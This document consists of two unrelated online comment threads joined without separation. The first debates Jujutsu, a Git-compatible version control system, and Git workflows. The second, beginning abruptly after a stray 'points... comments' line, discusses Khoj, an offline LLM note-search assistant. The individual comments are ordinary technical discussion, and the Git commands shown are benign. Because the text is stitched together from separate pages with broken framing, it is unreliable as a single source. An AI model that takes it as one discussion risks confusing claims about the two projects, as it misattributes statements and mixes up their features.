As a Brazilian Jiu Jitsu practitioner, I cringe when I see it spelled any other way, but also I have to recognize that I only feel that way because I have more exposure to that specific martial art/spelling.
I cringe whenever I see it spelt with an 'i.' It would be 'jujutsu' or similar in either of the typical romanization schemes (Hepburn, etc). 'Ji' would be pronounced 'jee' in any of the standard romanizations.
Pronunciation is more like joo-juh-tsu. 'Tsu' is its own syllable.
There are multiple romanisation systems for Japanese, but the most common one is Hepburn. In Japan, Kunrei-shiki is sometimes used (especially by the government), which is designed with Japanese speakers in mind (vs Hepburn which was designed with English speakers in mind).
It's jujutsu in both, but there are varying ways of representing the long vowel on the first 'u' -- either omitting it (jujutsu), using a macron or circumflex (jūjutsu), or repeating the vowel (juujutsu).
Ju-jitsu and jiu-jitsu are not correct in any romanisation system that I know of, I'm not really sure how they came about. Probably historical accident.
Oh its from Google? Eh. Pass. It will either be killed in 5 years, or be pitted against Git in an attempt to take over the community.
The 'disclaimer' is quite interesting. Starts off with 'this is not a Google product' and ends it with the fact that it is indeed their full-time project at Google.
I wish these well-intentioned Googlers realised what they are doing.
Oh, and you might be interested in https://radicle.xyz/. I tried it a while ago, was stable and has nice aesthetics to it as a bonus.
I was expecting to be meh, but by halfway through the readme I was thinking 'this actually sounds great!'
Nice to see this posted here. I switched over to it about 2-3 weeks ago, and I haven't looked back. It took a lot of mental rewiring, but I really enjoy the workflow `jj` provides. There's no longer a time to think about what's being committed, because all file changes automatically amend the working copy commit. Of course, sometimes you don't want this, so you have things like the ability to split a commit into two, moving commits, etc. But having _everything_ operate on commits is really nice! Other niceties that I like:
- `jj log` is awesome for getting an overview of all your branches. If, like me, you have a lot of work in progress at once, this provides a great map
- Conflict resolution is really cool, as you can partially resolve conflicts, and then switch branches. Conflicts are also tracked specially, but I haven't done too much with this yet.
- The abbreviated changeset ids are really handy. I often will just `jj log` (or in my case just `jj` as that's the default), notice a changeset I want to rebase, then run `jj rebase -s qr -d master`. `qr` here is an abbreviated changeset id for a branch/commit, and usually much quicker than typing the branch name out! This will probably change when clap gets updated to support dynamic tab-completion though.
What happens if you accidentally save a file with some sort of secret that gets sucked in?
Are you simply using it with GitHub repos?
It mentions that it can be used with backends like Dropbox, but it would be wonderful if we finally had a system that could easily be used with IPFS. This is especially important for large data, since you can't store 1TB on github (and no, I don't count lfs, since you have to pay for it).
IPFS is the natural solution here, since everyone that wants to use the dataset has it locally anyway, and having thousands of sources to download from is better than just one.
So if this uses IPFS for the data repo, I'm switching immediately. If it doesn't, it's not worth looking into.
I'd be curious to know if someone is successfully using this in a team. How is it when two people are working in the same branch?
How does it handle large binary files?
(the UX around this is the shortcoming of all current DVCS..)
Might want to look at purpose built tools for that such as lakeFS (https://github.com/treeverse/lakeFS/)
* Disclaimer: I'm one of the creators/maintainers of the project.
README says that the git backend is the recommended backend, as the 'native' one has no additional features, so I imagine: it handles them the same as git (ie. they are just objects in the .git repo data, and each time you change them you add a new one, and they are poorly compressible and optimizable) -- which is, I imagine, the problem you're referring to.
Now I'm curious: how would you want a DVCS to handle large binaries?
Jujutsu started as author's personal project and now author's full-time project at Google. It's presented at Git Merge 2022:
Jujutsu: A Git-Compatible VCS - Git Merge 2022:
Video:
Slides:
https://docs.google.com/presentation/d/1F8j9_UOOSGUN9MvHxPZX...
> started as author's personal project and now author's full-time project at Google
That's got to feel good!
I'm semi-sold on the idea of everything always being a commit, and lighter weight editing of those commits & structure, it sounds good. Except:
1. Not until I run some jj command? It's kind of begging for a 'jjd' isn't it? Or if you use an IDE you'd want/need it to be not just saving but doing some kind of 'jj nop'.
2. I haven't looked more into it than the readme, but that at least doesn't discuss (and I think it's important) withholding commits from the remote(s)? If everything's always(ish) committed, I've lost some control of untracked files or unstaged or locally stashed changes that I now need at the point of pushing; to mark those commits 'private' or something. I assume it does exist, and I'll look for it when I make time to play with it, but I find it slightly concerning (for how good it will be, or how important it's considered to be) that it's not more prominently discussed.
> Not until I run some jj command? It's kind of begging for a 'jjd' isn't it? Or if you use an IDE you'd want/need it to be not just saving but doing some kind of 'jj nop'.
In practice, I find that it doesn't matter much. Some people do run `jj` in a loop incidentally (usually they have a live graph-log open on some screen). I suppose that you could get a 'local history' feature like in some editors of more fine-grained changes to the codebase in this way. Folks have discussed adding a jj daemon, but so far it's not a priority.
> I haven't looked more into it than the readme, but that at least doesn't discuss (and I think it's important) withholding commits from the remote(s)? If everything's always(ish) committed, I've lost some control of untracked files or unstaged or locally stashed changes that I now need at the point of pushing; to mark those commits 'private' or something. I assume it does exist, and I'll look for it when I make time to play with it, but I find it slightly concerning (for how good it will be, or how important it's considered to be) that it's not more prominently discussed.
Usually it's pretty obvious to me which of my commits are public or private. When interfacing with GitHub, commits that are not reachable by a branch are definitely private. Additionally, commits without a description are private, and `jj git push` will warn you before allowing you to push them.
There has been some discussion about adopting Mercurial-style 'phases' (https://wiki.mercurial-scm.org/Phases), which would explicitly accomplish the goal of marking commits public or private.
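In other words, keeping work private is mostly about not pointing a branch at it; a rough sketch of the publish step (the branch name is illustrative):

jj branch create my-feature      # point a branch at the working-copy commit
jj git push --branch my-feature  # only commits reachable from that branch get pushed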
The jj daemon thing is something I've had on my mind to maybe hack up, but in practice it's not that huge of a deal I've found.
It is worth noting that jj is designed as a CLI and a library. So, for the hypothetical IDE integration, it could use its own custom written daemon or just integrate all this as part of its autosave functionality via the Rust crates. That's the long-term goal, anyway.
Do I understand this correctly?
This is some kind of background process that automatically commits any changes you make.
You can use the CLI to check what it did and if you want to modify the auto commits.
No daemon, it happens 'whenever you run a command'.
> Commands snapshot the working copy before they start, then the update the repo, and then the working copy is updated (if the working-copy commit was modified). Almost all commands (even checkout!) operate on the commits in the repo, leaving the common functionality of snapshotting and updating of the working copy to centralized code.
> If an operation results in conflicts, information about those conflicts will be recorded in the commit(s). The operation will succeed. You can then resolve the conflicts later.
I'm really glad people are trying this out. I've spent the last decade or so playing with collaborative editing algorithms. Ideally I'd like tools like git to eventually be replaced by CRDT based approaches. CRDTs would let us use the same tools to do pair programming. CRDTs also handle complex merges better (no self-conflicts like you can get with git). And they're generally a more powerful model.
One problem with all modern text CRDTs (that I know of) is that they do automatic conflict-free resolution of concurrent edits. But when we collaborate offline on code, we usually want conflicts to show up and be resolved by hand. CRDTs should be able to handle that no problem - they have more information about the edit history than git, but doing this properly will (I think) require that we put the conflicts themselves into the data model for what a text file is. And I'm not sure how that should all work with modern text editors!
Anyway, it sounds like jj has figured out the same trick. I'm excited to see how well it works in practice. With this we're one step closer to my dream of having a crdt based code repository!
You should check out Pijul, as it essentially implements everything you mentioned here. Pijul works on patches which are CRDTs, it makes conflicts a first-class concept, etc.
Have you not ever found any value in `git bisect`?
If you have a bug which is reproducible, but whose cause is complex, do you not think it's useful to be able to find the commit that introduced the bug in order to see which change caused it? If only to get a good first idea of what might need to be fixed?
Currently, `git bisect` works best if every commit is buildable and runnable, in order that any commit can be automatically tested for the presence of the bug, to narrow down the problem commit as quickly as possible. If some commits don't build or run because they contain conflict markers, this make `git bisect` need a lot more manual intervention.
Can you think of a way in which an equivalent of `git bisect` might be adapted to work in this scenario?
Note that just scanning for conflict markers might not be appropriate, in case a file legitimately contains text equivalent to conflict markers - e.g. in documentation talking about conflict markers, or something like `=======` being usable as an underline in some markup languages.
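For what it's worth, `git bisect run` already has a convention that could carry over: an exit code of 125 tells bisect to skip a commit it can't test, so unbuildable (or conflict-marked) revisions don't need manual intervention. A rough sketch, with placeholder names:

git bisect start <bad-commit> <good-commit>
git bisect run sh -c 'make || exit 125; ./run-failing-test.sh'   # 125 means "skip this commit"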
> Ideally I'd like tools like git to eventually be replaced by CRDT based approaches. CRDTs would let us use the same tools to do pair programming. CRDTs also handle complex merges better (no self-conflicts like you can get with git). And they're generally a more powerful model.
I'd be interested to see how this plays out in practice.
It seems to be in conflict with the idea that scm history is a meaningful deliverable that should be arranged as series of incremental atomic changes before a patch series leaves your development machine.
However, most developers I interact with already treat git history as an infinite editor undo history, this approach seems like it would crystalize that fact.
How do you envision the (long-term) history working? Do you think it would provide more/less utility?
This project is a great example of subliminal marketing.
It is less apparent now, but still, the repeated flexing of "Google", "20% project", etc., when no typical reader would assume them, is classic corporate charlatanry.
Shame because I like the project otherwise
It may be a calculated move. But, more charitably, perhaps it is simply unpolished communication.
Looks really cool! One thing I'm not clear on from the docs: does it support ignoring changes to some files for 'real' commits? For example, a repo at work has a file used for mocking up feature flags. The file is tracked but it's encouraged to edit it when testing things, just don't commit your changes. If I'm not mistaken, I'd have to remember to undo changes to that file before 'describing' the commit. Is that right?
The commit will indeed be created immediately; there's no way to prevent that except for .gitignore that I'm aware of. Until you run `jj describe`, it won't have a description.
However, if you don't manually put a branch on it, it'll never get pushed and will stay on your machine only.
You can sit on this personal commit and rebase it on top of any other commit to move around the repo, again and again if you like.
I know the nuisance of having to tiptoe around files you don't want to add to history.
In case it helps your use case:
git update-index --assume-unchanged <file>
git update-index --no-assume-unchanged <file>
This would ignore changes while you're testing - but you have to remember to turn it off or, iiuc, you won't pull intentional changes either. You might find hooks useful too. Not to assume your knowledge, these are shell scripts placed in .git/hooks that are invoked, e.g., before commit or before push. You could have a hook parse git status, detect changes to <file>, prompt for confirmation if changed, and remove it from the working set if the change is unintentional.
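A hedged sketch of that hook idea, for the grandparent's mock-flags case (the file path is hypothetical; adjust to your repo):

#!/bin/sh
# .git/hooks/pre-commit -- refuse to commit the local feature-flag mock file
MOCK_FILE="config/feature_flags.mock.json"   # hypothetical path
if git diff --cached --name-only | grep -qx "$MOCK_FILE"; then
  echo "Refusing to commit changes to $MOCK_FILE." >&2
  echo "Unstage it with: git restore --staged $MOCK_FILE" >&2
  exit 1
fi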
Looks interesting. Unfortunately doesn't support signing commits - apparently it's possible via 'jj export' and using classical git:
https://github.com/martinvonz/jj/issues/58#issuecomment-1247...
The plan for how to add signed commits is there, and the work isn't that hard (especially as gitoxide continues to add functionality), it just has to be pushed over the line and I've been a bit slack on getting that going.
There's definitely nothing foundational blocking it though and it will happen one day if you'd like to give it a go in the meantime.
This looks promising. One question I had after reading about its git compatibility is that they seem mostly focused on the use case where a Jujutsu user accesses a git repository (hosted by e.g. GitHub) with jj. But does it support the converse way of working, i.e. accessing a native Jujutsu repository with git?
I ask this because most developers are already quite familiar with the git CLI so in production use one would probably see developers co-working with jj and git in the same codebase. Or would the realistic production scenario be always using git (as opposed to native Jujutsu database) as the backing storage to allow accessing both with git and jj CLIs?
The README's footnote:
At this time, there's practically no reason to use the native backend. The backend exists mainly to make sure that it's possible to eventually add functionality that cannot easily be added to the Git backend.
I would assume there would always be the expectation that you either use Jujutsu as a frontend to a git repo, or have completely Jujutsu-based remotes.
If you're going to work on and contribute to a project that is already using Jujutsu, it is reasonable to expect that you'd adapt your workflow to the project itself and not the other way around.
This Git-compatibility-first approach makes Jujutsu seem like a stronger contender to replace Git than I've seen so far.
I'm curious about its management of conflicts. I know that pmeunier has taken a lot of care to formally work out a theory of patches to drive Pijul, and that unsound or problematic notions of patches/conflicts can lead to serious problems— they say that's what led to all the performance problems with Darcs, right? I'd love if the comparison page on the repo wiki gave a little more detail than that Pijul's handling of conflicts seems 'similar'.
There is a little more detail here: https://github.com/martinvonz/jj/blob/main/docs/technical/co...
Storing the conflicts symbolically in this way lets you reproduce the conflicts later and even auto-resolve certain conflicts, but it doesn't address resolving the actual contents of conflicts. You could probably use Pijul as a jj backend and get the best of both worlds (if someone were to implement it).
I am certainly no expert in version control systems, but I've gotta say that it's really wonderful to see a project that builds on the algorithmic and cultural successes of Git but with a simplified and modernized approach. The reason that Git took over the open-source world is two-fold: first, it was adopted by Linux, which ended up being the most influential OSS project of all time. Second, the Git model, which is distributed and egalitarian at its core, is a natural model for a fast-paced, globally distributed community of developers. These are both reasons to appreciate Git, but they do not imply that Git is the final word in version control. I'm excited to see innovation in this space!
> which is distributed and egalitarian at its core, is a better model for a fast-paced, globally distributed community of developers than previous monorepo systems like Mercurial
I'm a bit confused by this. I don't think that's what monorepo means, is it? Monorepo is what you choose to put in a repo? And I thought Mercurial was extremely similar to Git as it's also a DVCS?
I am too; it's hard, now, to imagine anything dethroning git, but presumably something will do so one day, and this could be that thing.
SQLite uses a custom vcs called Fossil, but doesn't make much effort to push broader adoption (afaics) so it remains academic at this point.
Jujutsu keeping git compatibility looks like a differentiator that reduces cost of adoption. I'm excited!
It's nice to have alternatives and maybe I have Stockholm Syndrome about this topic, but isn't git's complexity inherent to the area?
Git fails to make the common paths simple. There's no need for most of the complexity to be so prevalent in day to day use
I would say 'What a weird name for a VCS. Whether that will work ...', but then I have to remind myself of the dictionary meaning of 'git'. So who knows. Maybe we will be adopting all kinds of martial arts terminology. For example: 'I use Karate to manage my code. I divide everything using chops. When a kata is done, ...'
It's a horrible name to pronounce for many non-English speakers.
what's the advantage of native backend compared to git repo backend?
> At this time, there's practically no reason to use the native backend. The backend exists mainly to make sure that it's possible to eventually add functionality that cannot easily be added to the Git backend.
From the README, no advantage for now.
I haven't really used git on the command line for years now, except for some special cases. In my daily usage, I rely on the built-in IDE integration (IntelliJ, FWIW), and I don't understand why anyone would put up with doing it manually. I can do partial commits by selecting individual lines right in my editor. I can view all branches, merge them, cherry-pick from them, commit stuff or amend it, pull updates, edit tags - everything at once, with keyboard shortcuts.
Apparently, I'm in the minority here (also considering all the talk about git being such an essential skill that real programmers can issue commands blindfolded). Why is that?
I don't know about 'real' programmers, but I have an, admittedly, irrational fear of git GUIs doing the wrong thing. Even in Intellij, I open the built in CLI to interact with git. Old habits die hard :)
How well does your integration handle stacked PRs (if at all)? I find that the majority of my interaction with git is super basic that I get no value add replacing `git add -p` (esp. since I'm always in my terminal with Vim/tmux).
What _is_ annoying and something I could probably automate if I thought about it for more than a few minutes is when:
a) I have stacked PRs for isolation/workflow purposes in the form of: A <- B <- C
b) we use squash and merge
c) now when A gets merged I need to fix B and C because while the change set is the same the history is not (because of the squash & merge)
d) when B gets merged I have to fix C for the same reasons
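One way to script the fix-up described above, assuming branches literally named A, B, C and a squash-merged main (names are illustrative):

# After A is squash-merged into main, B still carries A's original commits:
git fetch origin
git rebase --onto origin/main A B   # replay only B's own commits onto the new main
# After B is squash-merged, repeat for C:
git rebase --onto origin/main B C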
My experience with IDE integration is that it never implements the full feature set of the git CLI. It's probably improved, but I've generally found that anything besides basic clone/branch/commit/merge with very few developers and branches eventually leads to having to resort to the git CLI to resolve issues.
A lot of people who are starting out using git don't understand how git works (what a commit is, what a branch is, what you can do to them). And they start to blame the CLI tool and start to hope that using the GitHub Desktop app will make everything make sense. This is the most common context where people say "you have to learn the git CLI."
(Here's an example from a few days ago from someone who proposes using GitHub Desktop in order to avoid learning git commands: https://www.reddit.com/r/learnprogramming/comments/15b7pra/s...)
> I rely on the built-in IDE integration (IntelliJ, FWIW)
That you're using IntelliJ makes a huge difference. VSCode's git integration is okay, but I honestly just reach for the command line if I'm using VSCode for a project. IntelliJ's, though, is hands down the best git UI out there. Even standalone apps can't compete with the convenience of having all the features bundled directly into your editor.
From what I've seen, a lot of people have tried git integrations in other IDEs and found that they are missing functionality and the features they do have aren't well done, so they assume that all git integrations will be the same. But as I've been reading through all the jj testimonials here, I can't help thinking that I already have all of this through the IntelliJ git plugin.
Because I have two types of people who understand git on my team. People who use the CLI and people who don't understand git and just start clicking buttons
I have realized I have 15 years of git experience (incredible if true) and just got really, really used to it. Still excited if jj is a good follow-up since it sounds like it's not too far away from git's model.
Because I have always and will always prefer to interact with my VCS on the command-line.
The skillset is portable across environments (I can remote into a box and look at a repo as easily as I can interact with one locally), across editors (I don't have to learn and re-learn how each editor interacts with the VCS), and I can use all my familiar tools to work with it.
As for those workflow examples, I can just as easily do all those things via the command-line. The editor integration isn't anything special. And when I need to do something weird and advanced (e.g. interacting with the reflog), odds are I'm gonna have to bust out those command-line skills, anyway.
Why would that be so hard to believe?
Edit: BTW, to be clear, I have no issues with people using GUIs. If you're productive with your tooling, who am I to judge? But you asked why, so I answered why. I don't claim my way is any better than your way.
Either it's employers who got tired of people not even knowing the basics of git (which would be common to any dvcs) and weren't productive as a result.
Or it's folks that think the base set of linux tools are the be-all-end-all of programming. ('Why use Dropbox when I can rsync', 'Use the ext4 filesystem as a database and store metadata in inodes and use git for MVCC', 'I will do sed | awk | cut | xargs find | tr instead of a 10 line python script').
Or it's folks that cult-follow one of the two groups above.
Has anyone tried both this and Sapling? https://engineering.fb.com/2022/11/15/open-source/sapling-so...
Both of these are on my TODO lists but haven't had time to try them yet.
Check out https://github.com/martinvonz/jj/blob/main/docs/sapling-comp...
In my opinion:
- Sapling is much more mature/full-featured at this point. - Jujutsu improves source control workflows in a more principled way. - Jujutsu currently supports colocation with a Git repo, while Sapling requires that the Git repo be kept separately.
'working copy is automatically committed' seems like a good idea at first glance, but there are many situations where this is not a good idea:
- when new artefact files are added and you have not yet added them to .gitignore, they'll be automatically committed
- when you have added ignored files in one branch and switch to another branch, the files will still be in your working copy but not listed in your .gitignore file, and would then be automatically committed
- staging only some files and committing is much easier than splitting a commit after the fact
I most definitely agree. To be honest I know I go against the current here, but so far there is nothing I really like from what I've seen in jj. I should try it for real, see how it feels when using it to get a better sense of it.
> - staging only some files and comitting is much easier than splitting a commit after the fact
I see this project as a challenge to that conventional wisdom. This view is certainly the one I have embedded in my mind. But is it right? I end up fixing up the index and amending commits post facto quite often. I can also do it pre facto. But in a world where you can't fully avoid editing after the fact, mightn't it be better to have a single workflow for this kind of editing? That is, if you can't totally get rid of post facto commit editing (which I think is reality), can you actually get rid of pre facto editing, and be left with just one editing workflow? If so, maybe that's good!
I haven't used this yet, but this strikes me as a very plausible attack on a conventional wisdom that we take for granted but may not actually be doing us any favors.
I'm of the same opinion as you, here. I generally have 10+ 'extra' files in my project directory (output files, notes, one-off scripts for certain things, etc). When I add files to a commit, I do it by filename, never 'everything that's new/changed'. I don't have a use case for 'everything I've created/changed goes into the commit, always'.
> switch to another branch, the files will still be in your working copy but not listed in your .gitignore file
This is a failing of git, imo. There should be a .local.gitignore or somesuch that is 'added to' .gitignore. It's VERY common for me to have files that I want ignored, but are specific to me; they don't belong in the project's .gitignore. I know there are ways to do this, but all of them are clunky. There should be a simple, out of the box way to do it.
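For reference, the built-in (if somewhat hidden) mechanisms the parent alludes to are a per-repo personal exclude file and a global one:

echo "scratch/" >> .git/info/exclude                      # per-repo, personal, never committed
git config --global core.excludesFile ~/.gitignore_global
echo "*.notes.md" >> ~/.gitignore_global                  # applies to every repo on this machine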
> staging only some files and comitting is much easier than splitting a commit after the fact
Re this point, how is it any different? 'Staging' the files is essentially the same as splitting the commit, anyways — it's just that the newly-split contents go into a 'staging area' vs a commit. Do you mean that the tooling to accomplish this is not good?
I don't see how these things are an issue in jjs design, nor do I see how staging some files is easier than splitting a commit after the fact...
Check out the documentation, many of the cases you are concerned about are explicitly mentioned:
https://github.com/martinvonz/jj/blob/main/docs/git-comparis...
Related DVCS: https://pijul.org/
I need to try it out at $WORK since constant rebasing on a busy repo with a hundred or so committers is not fun.
Pijul needs a 1.0 release if it wants wide adoption. I don't understand why they wait.
Meanwhile, if rebasing on git is an issue, you should probably try stacked-git (https://stacked-git.github.io/). It manages commits as a stack of patches - like quilt, but on top of git.
I just found another alternative to Git called Grace. It's made by a Microsoft employee in F#.
I saw the presentation; it's about having a cloud-ready or cloud-native SCM. I don't think this is a great idea.
Git is about working locally; GitHub (or similar solutions) is the cloud part.
A cloud-native SCM sounds like a bad idea.
I've just started looking into this, and since this seems to be doing a few automatic rebases under the hood, I wonder how this behaves if commits get randomly pushed to origin. With git it is always obvious when you are about to amend/overwrite a pushed HEAD, and you can only force-push explicitly.
Edit: anonymous branches seem destined to be pushed remotely (to be reviewed and merged), and there is no local merge as far as I can tell; you can name these branches, but there's no 'merge back to the development branch once done'. It's a completely different workflow. Having the ability to merge or 'collapse' an anonymous branch into its parent would be nice when you don't really need to push your feature branches anywhere.
> I wonder how this behave if commits get randomly pushed to origin
You would expect the push to fail in the normal way, as if you had manually done the rebase, because your commit history may have diverged. That being said, I don't think this happens much in practice: the automatic rebases are typically for explicit history-rewriting operations that users tend to only do on their local work. If a user prefers to use a 'no-rewriting' workflow, then they can certainly do so by simply not issuing the history-rewriting commands.
> anonymous branches are destined to be pushed remotely (to be reviewed and merged) and there is no local merge as far as I can tell, you can name these branches but no 'merge back to development branch once done'.
I'm not sure what you mean by this. You can do `jj merge` in a similar way to `git merge`, or you can do a rebase workflow.
554 points 2 days ago by 110 in 10000th position
github.com | | comments | anchor
I'm not a software dev.
Is there a way to have this bot read from a discord and google drive?
gpt4all itself (the library on the backend for this) has a similar program [1]. You just need to put everything into a folder. This should be straightforward for Google Drive. Harder for Discord, though, but I'm sure there's a bot online that can do the extraction.
Heads up, docker build fails with:
#12 2.017 ERROR: Could not find a version that satisfies the requirement pyside6>=6.5.1 (from khoj-assistant) (from versions: none)
#12 2.017 ERROR: No matching distribution found for pyside6>=6.5.1
------
executor failed running [/bin/sh -c sed -i 's/dynamic = \['version'\]/version = '0.0.0'/' pyproject.toml && pip install --no-cache-dir .]: exit code: 1
Darn, I've seen this error a couple of times. Can you drop a couple of details in this Github issue? https://github.com/khoj-ai/khoj/issues/391
I'm particularly interested in your OS/build environment.
I have not tried it, but something like this should exist. I don't think it is going to be as usable on consumer hardware yet unless you have a good enough GPU, but within a couple of years (or less) we'll be there, I am sure.
Irrelevant opinion - The logo is beautiful, I like it and so are the colours used.
Lastly, Llama 2 for such use cases is, I think, capable enough that paying for ChatGPT won't be as attractive, especially when privacy is a concern.
Keep it up. Good craftsmanship. :)
Thanks! I do think Llama V2 is going to be a good enough replacement for ChatGPT (aka GPT3.5) for a lot of use cases.
From previous answers it appears you're using standard Llama 7B (quantized to 4 bits). I suppose you're doing a search on the notes, then you pass what you found along with the original query to Llama. This technique is cool, but there are many limitations. For example, Llama's context length.
I can't wait for software that will take my notes each day and fine-tune an LLM on them so I can use the entire context length for my questions/answers.
> I can't wait for software that will take my notes each day and fine tune a LLM model on them so I can use entire context length for my question/answers
The problem is that finetuning does not work that way. Finetuning is useful when you want to teach a model a certain pattern, not when you want it to recall content accurately. E.g.: with enough finetuning and prompts, a model will be able to output the result in the format you need, but that does not guarantee it won't be prone to hallucination. The best way to minimize hallucination is still embedding-based retrieval, passed along with the question/prompt.
In the future, there could be a system where you build a knowledge base for LLMs, tell the model to access that for any knowledge, and finetune it for the patterns you want the output in.
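For anyone curious what 'embedding-based retrieval passed along with the prompt' looks like in practice, here is a minimal Python sketch using sentence-transformers; the model name, notes, and prompt format are illustrative and not what Khoj itself uses.

from sentence_transformers import SentenceTransformer, util

model = SentenceTransformer("all-MiniLM-L6-v2")  # small embedding model (illustrative choice)
notes = [
    "Meeting notes: ship khoj 0.10.1 on Friday",
    "Recipe: overnight oats with chia seeds",
    "Idea: index my Logseq graph next",
]
note_vecs = model.encode(notes, convert_to_tensor=True)  # embed the knowledge base once

def retrieve(query, k=2):
    """Return the k notes most similar to the query."""
    query_vec = model.encode(query, convert_to_tensor=True)
    hits = util.semantic_search(query_vec, note_vecs, top_k=k)[0]
    return [notes[hit["corpus_id"]] for hit in hits]

query = "When is the next release going out?"
context = "\n".join(retrieve(query))
prompt = f"Using only these notes:\n{context}\n\nAnswer this question: {query}"
# `prompt` is then sent to the LLM (a local Llama model or an API), keeping its
# context window free of everything except the few retrieved notes.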
How does one access this from a web browser?
We have a cloud product you can sign up for, but it's more limited in what data sources it supports. It currently only works for Notion and Github indexing. If you're interested in that, send me a dm on Discord - https://discord.gg/BDgyabRM6e
But that would allow you to access Khoj from the web.
[flagged]
hi, you seem keen to share something neat you took less than 10 minutes to implement, I'd love to see that?
As someone who's been getting into using Obsidian and messing around with chat AIs, this is excellent, thank you!
This seems like a cool project.
It would be awesome if it could also index a directory of PDFs, and if it could do OCR on those PDFs to support indexing scanned documents. Probably outside of the scope of the project for now, but just the other day I was just thinking how nice it would be to have a tool like this.
Yeah being able to search and chat with PDF files is quite useful.
Khoj can index a directory of PDFs for search and chat. But it does not currently work with scanned PDF files (i.e. not with ones without selectable text).
Being able to work with those would be awesome. We just need to get to it. Hopefully soon
I've wanted a crawler on my machine for auto-categorizing, organizing, tagging and moving ALL my files across all my machines - so the ability to crawl PDFs, downloads, screenshots, pictures, etc. and give me a logical tree of the organization of the files - and allow me to modify it by saying 'add all PDFs related to [subject] here and then organize by source/author' etc... and then 'move all my screenshots, ordered by date, here'
etc...
I've wanted a 'COMPUTER.', uh... I say 'COMPUTER!', 'sir, you have to use the keyboard', ah a Keyboard, how quaint.... forever.
I tried the search using a Slavic language (all my notes are in Slovene) - it performed very poorly: if the searched keyword was not directly in the note itself, the search results seemed to be more or less random.
Search should work with Slavic languages including Russian and 50+ other languages.
You'll just need to configure the asymmetric search model khoj uses to paraphrase-multilingual-MiniLM-L12-v2 in your ~/.khoj/khoj.yml config file
See http://docs.khoj.dev/#/advanced?id=search-across-different-l...
[flagged]
Please don't post low effort, shallow dismissals; without substantiation you're not posting anything useful, you're just a loud asshole.
Just a heads up, your landing page on your website doesn't seem to mention Llama/the offline usecase at all, only online via OpenAI.
----
What model size/particular fine-tuning are you using, and how have you observed it to perform for the usecase? I've only started playing with Llama 2 at 7B and 13B sizes, and I feel they're awfully RAM heavy for consumer machines, though I'm really excited by this possibility.
How is the search implemented? Is it just an embedding and vector DB, plus some additional metadata filtering (the date commands)?
> Just a heads up, your landing page on your website doesn't seem to mention Llama/the offline usecase at all, only online via OpenAI.
I am sufficiently uneducated on the ins and outs of AI integrations to always wonder if projects like this one can be used in local-only mode, i.e. when self-hosted, ensuring that none of my personal information is ever sent to a remote service. So it would be very helpful to very explicitly give me that assurance of privacy, if that's the case.
Thanks for the pointer, yeah the website content has gone stale. I'll try to update it by end of day.
Khoj is using the Llama 7B, 4bit quantized, GGML by TheBloke.
It's actually the first offline chat model that gives coherent answers to user queries given notes as context.
And it's interestingly more conversational than GPT3.5+, which is much more formal
What's the recommended 'size' of the machine to run this?
I tried to run it on a pretty beefy machine (8 core CPU/32 GB RAM) to use with ~40 odd PDF documents. My observation is that chat queries take forever, and I'm also getting Segmentation fault (core dumped) for every other query or so.
Thanks for the feedback. Does your machine have a GPU? 32GB CPU RAM should be enough but GPU speeds up response time.
We have fixes for the seg fault[1] and improvements to the query speed[2] that should be released by end of day today[3].
Update khoj to version 0.10.1 with pip install --upgrade khoj-assistant later today to see if that improves your experience.
The number of documents/pages/entries doesn't scale memory utilization as quickly, and doesn't affect the search and chat response times as much.
[1]: The seg fault would occur when folks sent multiple chat queries at the same time. A lock and some UX improvements fixed that
[2]: The query time improvements are done by increasing batch size, to trade-off increased memory utilization for more speed
[3]: The relevant pull request for reference: https://github.com/khoj-ai/khoj/pull/393
Could this do something like take in the contents of my web history for the day and summarize notes on what I've been researching?
This is getting very close to my ideal of a personal AI. It's only gonna be a few more years until I can have a digital brain filled with everything I know. I can't wait
That would be pretty awesome. Building a daily web history summarizer as a browser extension shouldn't be too much work. I bet there's something like that already out there.
Having something that indexes all your digital travels and makes it easily digestible will be gold. Hopefully Khoj can become that :)
Interesting, this is the exact question that came to mind for me. This would address a pain point for me.
Does anyone have recommendations for a tool that does it?
Or, anyone want to build it together?
I'm in search of a new MacBook Mx. What are the requirements for running these models locally without breaking the bank? Would 32GB be enough?
I've been playing with Khoj for the past day - it's really neat, well done!
A few observations:
1. Telemetry is enabled by default, and may contain the API and chat queries. I've logged an issue for this along with some suggestions here: https://github.com/khoj-ai/khoj/issues/389
2. It would be advantageous to have configuration in the UI rather than baking its YAML into the container image. (added a note on that in the aforementioned issue on Github).
3. It's not clear if you can bring your own models, e.g. can I configure a model from huggingface/gpt4all? if so, will it be automatically downloaded based on the name or should I put the .bin (and yaml?) in a volume somewhere?
4. AMD GPU/APU acceleration (CLBLAS) would be really nice, I've logged an issue for this feature request as well. https://github.com/khoj-ai/khoj/issues/390
Thanks for the feedback! Much appreciated.
I responded in the issue, but I'll paste here as well for those also curious:
Khoj does not collect any search or chat queries. As mentioned in the docs, you can see our telemetry server[1]. If you see anything amiss, point it out to me and I'll hotfix it right away. You can see all the telemetry metadata right here[2].
[1]: https://github.com/khoj-ai/khoj/tree/master/src/telemetry
[2]: https://github.com/khoj-ai/khoj/blob/master/src/khoj/routers...
Configuration with the `docker-compose` setup is a little bit particular, see the issue^ for details.
Thanks for the reference points for GPU integration! Just to clarify, we do use GPU optimization for indexing, but not for local chat with Llama. We're looking into getting that working.
Would it be possible to support a custom URL for the local model, such as running ./server in ggml would give you?
This may be more difficult if you are pre-tokenizing the search context.
Very cool project.
Something I've noticed playing around with Llama 7b/13b on my Macbook is that it clearly points out just how little RAM 16GB really is these days. I've had a lot of trouble running both inference and a web UI together locally when browser tabs take up 5GB alone. Hopefully we will see a resurgence of lightweight native UIs for these things that don't hog resources from the model.
Or hopefully we will see an end of the LLM hype.
Or at least models that don't hog so much RAM.
The new Chrome 'memory saver' feature that discards the contents of old tabs saves a lot of memory for me. Tabs get reloaded from the server if you revisit them.
FWIW I've also had browser RAM consumption issues in life, but it's been mitigated by extensions like OneTab: https://chrome.google.com/webstore/detail/onetab/chphlpgkkbo...
For now, local LLMs take up an egregious amount of RAM, totally agreed. But we trust the ecosystem is going to keep improving and growing and we'll be able to make improvements over time. They'll probably become efficient enough where we can run them on phones, which will unlock some cool scope for Khoj to integrate with on device, offline assistance.
Awesome work, I've been looking for something like this. Any plans to support Logseq in the future?
Yes, we hope to get to it soon! This has been an ask on our Github for a while[1]
Hey, I saw Khoj hit HN a few weeks ago and get slaughtered because the messaging didn't match the product.
You've come a good way in both directions: the messaging is clearer about current state vs aspirations, and you've made good progress towards the aspirational parts.
Really glad to see the warm reception you're getting now. Nice job, y'all.
